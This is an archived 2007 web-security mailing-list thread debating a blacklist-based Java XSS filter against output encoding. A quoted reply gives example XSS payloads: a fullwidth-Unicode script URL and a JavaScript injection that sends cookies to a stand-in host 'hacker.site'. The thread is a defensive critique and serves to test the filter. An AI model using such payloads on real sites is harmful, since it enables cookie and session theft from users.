[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks

From: "Prasad Shenoy" <prasad.shenoy@xxxxxxxxx>
Subject: Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
Date: Tue, 23 Jan 2007 14:43:34 -0500
------=_Part_38599_11157051.1169581414485
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Well I have seen Microsoft's AntiXSSLibrary to be very effective for .Net
applications and to cover your point it is part of .NET "Framework".

Of course, that does not resolve the need for Java based applications per se
but I am not sure if I agree with points 1 & 2 in your email.

Thanks.

On 1/23/07, Anurag Agarwal <a_agrawwal@yahoo.com> wrote:
>
> I agree that it does not covers all the websites. For examples blogs which
> lets you enter certain html characters or the mathematics site as you
> mentioned, but then in my opinion 5-10% of the websites would require such
> data and even those sites would not require in all of the input. Most of the
> websites in their regular functionality would not even need the filtered
> characters here as input.
>
>
>
> Anti xss library or such options exist but there are two things i wanted
> to mention about them
>
>
>
> 1. How many developers would put in an effort to understand the library
> and use them as directed. This is a very simple approach and any java
> developer would be able to understand this. Moreover, it is very easy to
> imlpement.
>
> 2. This is a very lightweight module as compared to an anti xss library.
> In a production environment why would you want to add more CPU processing
> when you dont need it. With my example this is as simple as it gets for the
> websites which really don't need any of the blacklisted characters here.
>
>
>
> Also,
>
> Even this approach is considered as a blacklisted characters approach, in
> my opinion, these are the characters which are used in combination to
> perform an attack(for example using backslash as escape character, 0x for
> hex, etc). So by blocking them we cover most of the basis (when i say most,
> i mean i am not sure if i missed on any character and hence posted here for
> my fellow appsec professionals to uncover any such character).
>
>
>
> Lastly -
> One thing i would like to point out here is that in my personal opinion
> more then 40% of the code in the production is a result of copy paste from
> the internet. Developers are looking for a solution which is easier to
> understand and implement. My solution here may be limited for certain types
> of websites but can definitely work for most of them.
>
> Unless a proper anti xss library is built into the framework, there is a
> bigger chance that the developers might not use it properly. This code here
> can fix most of the vulnerabilities. Agreed not all but then thats why i
> posted on these forums to get ideas to build this into a more robust and
> reusable xss filter.
>
>
> Cheers,
>
>
>
> Anurag Agarwal
>
>
>
> SEEC - An application security search engine<http://www.myappsecurity.com/>
>
> Web: www.attacklabs.com , www.myappsecurity.com
>
> Email : anurag.agarwal@yahoo.com
>
> Blog : http://myappsecurity.blogspot.com
>
>
>
>
> ----- Original Message ----
> From: celf <celf@cudge.org>
> To: "webappsec @OWASP" <webappsec@lists.owasp.org>
> Cc: WASC Forum <websecurity@webappsec.org>
> Sent: Tuesday, January 23, 2007 8:25:14 AM
> Subject: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss
> attacks
>
> Hello,
>
> The main problem I see with it is that it could corrupt your data. There
> may be cases when you actually need those characters to be stored. Take
> for example, mathematics. It's not uncommon for greater-than, etc.,
> symbols to be used. Input validation as a means to make output safe does
> not work, at least not for very long. The simple approach to protecting
> against XSS is to encode it properly for the output layer.
>
> I maintain that the best way to do this is to format output characters
> into their appropriate HTML entities (JavaScript output
> notwithstanding). So, < becomes &lt; or &#60;. In fact, I've a page that
> does no input validation at all, but transforms every output character
> NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.
>
> Second, your filtering approach is the standard "blacklist" approach,
> and while it may fine for most things, there will be circumstances when
> it won't. Take for example:
>
>
> http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert('xss')%uff1c/script%uff1e&B1=Submit<http://www.attacklabs.com/xssfilter/filter?html=%25uff1cscript%25uff1ealert%28>
>
> On your site, this simple attack does not work. However, there is a
> known vulnerability in .NET <= 1.1 that does allow this script to
> execute. Note that I didn't try very hard, someone else YMMV.
>
> http://lists.seifried.org/pipermail/security/2005-February/007054.html
>
> Finally, your filter won't work for dynamic paramters being written into
> JavaScript (which I see all the time as an XSS vector), e.g.,
>
> code:
> response.write("<script>x='"&<%=server_side_var%>&"';alert(x);</script>")
>
> exploit (sending this as the server side param value):
> a'; document.location='hacker.site?cookies='+document.cookies;var y='a
>
> So, your approach works, it's just tough to maintain when new exploits
> come out or when not applied to a very specific case. Admittedly, my
> approach isn't complete here either, but I'm sure others have more to add.
>
> -c
>
> anurag.agarwal@yahoo.com wrote:
> > The source code is uploaded to the page. You can either view it
> > at
> http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.htmlor
> > download the java file at
> http://www.attacklabs.com/xssfilter/XSSFilter.java
> >
> > The url to test this filter is http://www.attacklabs.com/xssfilter/
> >
> >
> > Cheers,
> >
> >
> >
> > Anurag Agarwal
> >
> >
> >
> > SEEC - An application security search engine <
> http://www.myappsecurity.com/>
> >
> > Web: www.attacklabs.com <http://www.attacklabs.com/> ,
> > www.myappsecurity.com <http://www.myappsecurity.com/>
> >
> > Email : anurag.agarwal@yahoo.com <mailto:anurag.agarwal@yahoo.com>
> >
> > Blog : http://myappsecurity.blogspot.com
> > <http://myappsecurity.blogspot.com/>
> >
> >
> >
> >
> >
> > ----- Original Message ----
> > From: Amit Klein <aksecurity@gmail.com>
> > To: Anurag Agarwal <anurag.agarwal@yahoo.com>
> > Cc: WASC Forum <websecurity@webappsec.org>; "webappsec @OWASP"
> > <webappsec@lists.owasp.org>
> > Sent: Monday, January 22, 2007 11:50:06 PM
> > Subject: Re: [Webappsec] xss filter to protect from xss attacks
> >
> > Anurag Agarwal wrote:
> >> I have created a xss filter to protect from xss attacks. Though i have
> >> filtered only for 8 characters but i was able to test against all the
> >> attacks mentioned in the RSnake's cheat sheet. Appscan was not able to
> >> detect any xss attacks on it. I request the application security
> >> community to help test this filter. 90% i am sure that you wont be
> >> able to perform any xss attack on it, the rest 10% i will find out
> >> after the feedback from the community. For the curious mind, it is
> >> written in java
> > If this is an open source project - then where is the source code? if
> > it's not - then why should we bother testing it?
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Webappsec mailing list
> > Webappsec@lists.owasp.org
> > http://lists.owasp.org/mailman/listinfo/webappsec
>
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


-- 
Prasad

------=_Part_38599_11157051.1169581414485
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Well I have seen Microsoft&#39;s AntiXSSLibrary to be very effective for .Net applications and to cover your point it is part of .NET &quot;Framework&quot;. <br><br>Of course, that does not resolve the need for Java based applications per se but I am not sure if I agree with points 1 &amp; 2 in your email. 
<br><br>Thanks.<br><br><div><span class="gmail_quote">On 1/23/07, <b class="gmail_sendername">Anurag Agarwal</b> &lt;<a href="mailto:a_agrawwal@yahoo.com";>a_agrawwal@yahoo.com</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div><div style="font-family: arial,helvetica,sans-serif; font-size: 10pt;"><p>I agree that it does not covers all the websites. For examples blogs which lets you enter certain html characters or the mathematics site as you mentioned, but then in my opinion 5-10% of the websites would require such data and even those sites would not require&nbsp;in all of the input. Most of the websites in their regular functionality would not even need the filtered characters here as input. 
</p>
<p>&nbsp;</p>
<p>Anti xss library or such options exist but there are two things i wanted to mention about them</p>
<p>&nbsp;</p>
<p>1. How many developers would put in an effort to understand the library and use them as directed. This is a very simple approach and any java developer would be able to understand this. Moreover, it is very easy to imlpement.
</p>
<p>2. This is a very lightweight module as compared to an anti xss library. In a production environment why would you want to add more CPU processing when you dont need it. With my example this is as simple as it gets for the websites&nbsp;which really don&#39;t need any of the blacklisted characters here.
</p>
<p>&nbsp;</p>
<p>Also,</p>
<p>Even this approach is considered as a&nbsp;blacklisted characters approach, in my opinion, these are the characters which&nbsp;are used in combination to perform an attack(for example using backslash as escape character, 0x for hex, etc). So by blocking them we cover most of the basis (when i say most, i mean i am not sure if i missed on any character and hence posted here for my fellow appsec professionals to uncover any such character). 
</p>
<p>&nbsp;</p>
<div></div>
<div>&nbsp;</div>
<div>Lastly -</div>
<div>One thing i would like to point out here is that in my personal opinion more then 40% of the code in the production is a result of copy paste from the internet. Developers are looking for&nbsp;a solution which is&nbsp;easier to understand and implement. My solution here may be limited for certain types of websites but&nbsp;can definitely work for most of them.
</div>
<div>&nbsp;</div>
<div>Unless a proper anti xss library is built into the framework, there is a bigger chance that the developers might not use it properly. This code here can fix most of the vulnerabilities. Agreed not all but then thats why i posted on these forums to get ideas to build this into a more robust and reusable xss filter.
</div><span class="q">
<div>&nbsp;</div>
<p>Cheers,</p>
<p>&nbsp;</p>
<p>Anurag Agarwal</p>
<p>&nbsp;</p>
<p><a href="http://www.myappsecurity.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">SEEC - An application security search engine</a></p></span>
<p>Web:&nbsp;<a href="http://www.attacklabs.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">www.attacklabs.com</a>&nbsp;, <a href="http://www.myappsecurity.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
www.myappsecurity.com</a></p><span class="q">
<p>Email : <a href="mailto:anurag.agarwal@yahoo.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">anurag.agarwal@yahoo.com</a></p></span><span class="q">
<p>Blog : <a href="http://myappsecurity.blogspot.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://myappsecurity.blogspot.com</a></p>
<p>&nbsp;</p>
</span><div style="font-size: 10pt; font-family: arial,helvetica,sans-serif;"><br><br>
<div style="font-size: 12pt; font-family: times new roman,new york,times,serif;"><span class="q">----- Original Message ----<br>From: celf &lt;<a href="mailto:celf@cudge.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
celf@cudge.org</a>&gt;<br>To: &quot;webappsec @OWASP&quot; &lt;<a href="mailto:webappsec@lists.owasp.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">webappsec@lists.owasp.org</a>&gt;<br>Cc: WASC Forum &lt;
<a href="mailto:websecurity@webappsec.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">websecurity@webappsec.org</a>&gt;<br></span><div><span class="e" id="q_110505d21f11283a_7">Sent: Tuesday, January 23, 2007 8:25:14 AM
<br>Subject: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks<br><br>
</span></div><div><div><span class="e" id="q_110505d21f11283a_9">Hello,<br><br>The main problem I see with it is that it could corrupt your data. There<br>may be cases when you actually need those characters to be stored. Take
<br>for example, mathematics. It&#39;s not uncommon for greater-than, etc.,<br>symbols to be used. Input validation as a means to make output safe does<br>not work, at least not for very long. The simple approach to protecting
<br>against XSS is to encode it properly for the output layer.<br><br>I maintain that the best way to do this is to format output characters<br>into their appropriate HTML entities (JavaScript output<br>notwithstanding). So, &lt; becomes &amp;lt; or &amp;#60;. In fact, I&#39;ve a page that
<br>does no input validation at all, but transforms every output character<br>NOT A-Z0-9 into an HTML entity. This works even for multi-byte characters.<br><br>Second, your filtering approach is the standard &quot;blacklist&quot; approach,
<br>and while it may fine for most things, there will be circumstances when<br>it
 won&#39;t. Take for example:<br><br><a href="http://www.attacklabs.com/xssfilter/filter?html=%25uff1cscript%25uff1ealert%28"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.attacklabs.com/xssfilter/filter?html=%uff1cscript%uff1ealert(&#39;xss&#39;)%uff1c/script%uff1e&amp;B1=Submit
</a><br><br>On your site, this simple attack does not work. However, there is a<br>known vulnerability in .NET &lt;= 1.1 that does allow this script to<br>execute. Note that I didn&#39;t try very hard, someone else YMMV.<br>
<br><a href="http://lists.seifried.org/pipermail/security/2005-February/007054.html"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://lists.seifried.org/pipermail/security/2005-February/007054.html
</a><br><br>Finally, your filter won&#39;t work for dynamic paramters being written into<br>JavaScript (which I see all the time as an XSS vector), e.g.,<br><br>code:<br>response.write(&quot;&lt;script&gt;x=&#39;&quot;&amp;&lt;%=server_side_var%&gt;&amp;&quot;&#39;;alert(x);&lt;/script&gt;&quot;)
<br><br>exploit (sending this as the server side
 param value):<br>a&#39;; document.location=&#39;hacker.site?cookies=&#39;+document.cookies;var y=&#39;a<br><br>So, your approach works, it&#39;s just tough to maintain when new exploits<br>come out or when not applied to a very specific case. Admittedly, my
<br>approach isn&#39;t complete here either, but I&#39;m sure others have more to add.<br><br>-c<br><br><a href="mailto:anurag.agarwal@yahoo.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">anurag.agarwal@yahoo.com
</a> wrote:<br>&gt; The source code is uploaded to the page. You can either view it<br>&gt; at <a href="http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://myappsecurity.blogspot.com/2007/01/xss-filter-to-protect-from-xss-attacks.html</a> or<br>&gt; download the java file at <a href="http://www.attacklabs.com/xssfilter/XSSFilter.java"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.attacklabs.com/xssfilter/XSSFilter.java</a><br>&gt;&nbsp;&nbsp;<br>&gt; The url to test this filter is <a href="http://www.attacklabs.com/xssfilter/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.attacklabs.com/xssfilter/</a><br>&gt;&nbsp;&nbsp;<br>&gt; <br>&gt; Cheers,<br>&gt; <br>&gt;&nbsp;&nbsp;<br>&gt; <br>&gt; Anurag Agarwal<br>&gt; <br>&gt;&nbsp;&nbsp;<br>&gt; <br>&gt; SEEC - An application security search engine &lt;<a href="http://www.myappsecurity.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.myappsecurity.com/</a>&gt;<br>&gt; <br>&gt; Web: <a href="http://www.attacklabs.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">www.attacklabs.com</a> &lt;<a href="http://www.attacklabs.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.attacklabs.com/</a>&gt; ,<br>&gt; <a href="http://www.myappsecurity.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">www.myappsecurity.com</a> &lt;<a href="http://www.myappsecurity.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.myappsecurity.com/</a>&gt;<br>&gt; <br>&gt; Email : <a href="mailto:anurag.agarwal@yahoo.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">anurag.agarwal@yahoo.com</a> &lt;mailto:<a href="mailto:anurag.agarwal@yahoo.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
anurag.agarwal@yahoo.com</a>&gt;<br>&gt; <br>&gt; Blog : <a href="http://myappsecurity.blogspot.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://myappsecurity.blogspot.com</a><br>&gt; &lt;
<a href="http://myappsecurity.blogspot.com/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://myappsecurity.blogspot.com/</a>&gt;<br>&gt; <br>&gt;&nbsp;&nbsp;<br>&gt; <br>&gt; <br>&gt; <br>&gt; ----- Original Message ----
<br>&gt; From: Amit Klein &lt;<a href="mailto:aksecurity@gmail.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">aksecurity@gmail.com</a>&gt;<br>&gt; To: Anurag Agarwal &lt;<a href="mailto:anurag.agarwal@yahoo.com"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
anurag.agarwal@yahoo.com</a>&gt;<br>&gt; Cc: WASC Forum &lt;<a href="mailto:websecurity@webappsec.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">websecurity@webappsec.org</a>&gt;; &quot;webappsec @OWASP&quot;
<br>&gt; &lt;<a href="mailto:webappsec@lists.owasp.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">webappsec@lists.owasp.org</a>&gt;<br>&gt; Sent: Monday, January 22, 2007 11:50:06 PM<br>&gt; Subject: Re: [Webappsec] xss filter to protect from xss attacks
<br>&gt; <br>&gt; Anurag Agarwal wrote:<br>&gt;&gt; I have created a xss filter to protect from xss attacks. Though i have<br>&gt;&gt; filtered only for 8 characters but i was able to test against all the<br>&gt;&gt; attacks mentioned in the RSnake&#39;s cheat sheet. Appscan was not able to
<br>&gt;&gt; detect any xss attacks on it. I request the application security<br>&gt;&gt; community to help test this filter. 90% i am sure that you wont be<br>&gt;&gt; able to perform any xss
 attack on it, the rest 10% i will find out<br>&gt;&gt; after the feedback from the community. For the curious mind, it is<br>&gt;&gt; written in java<br>&gt; If this is an open source project - then where is the source code? if
<br>&gt; it&#39;s not - then why should we bother testing it?<br>&gt; <br>&gt; <br>&gt; ------------------------------------------------------------------------<br>&gt; <br>&gt; _______________________________________________
<br>&gt; Webappsec mailing list<br>&gt; <a href="mailto:Webappsec@lists.owasp.org"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">Webappsec@lists.owasp.org</a><br>&gt; <a href="http://lists.owasp.org/mailman/listinfo/webappsec"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://lists.owasp.org/mailman/listinfo/webappsec</a><br><br><br>----------------------------------------------------------------------------<br></span></div><span class="q">The Web Security Mailing List: <br><a href="http://www.webappsec.org/lists/websecurity/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.webappsec.org/lists/websecurity/</a><br><br>The Web Security Mailing List Archives: <br><a href="http://www.webappsec.org/lists/websecurity/archive/"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.webappsec.org/lists/websecurity/archive/</a><br><a href="http://www.webappsec.org/rss/websecurity.rss"; target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.webappsec.org/rss/websecurity.rss
</a> [RSS Feed]</span></div></div><br></div></div></div>
</blockquote></div><br><br clear="all"><br>-- <br>Prasad<br>

------=_Part_38599_11157051.1169581414485--
References:
- Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
  - From: Anurag Agarwal
Prev by Date: Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
Next by Date: Re: [WEB SECURITY] xss filter to protect from xss attacks
Previous by thread: Re: [WEB SECURITY] Re: [Webappsec] xss filter to protect from xss attacks
Next by thread: [WEB SECURITY] Re: [Webappsec] [WEB SECURITY] xss filter to protect from xss attacks
Index(es):
- Date
- Thread
Brought to you by http://www.webappsec.org
Search this site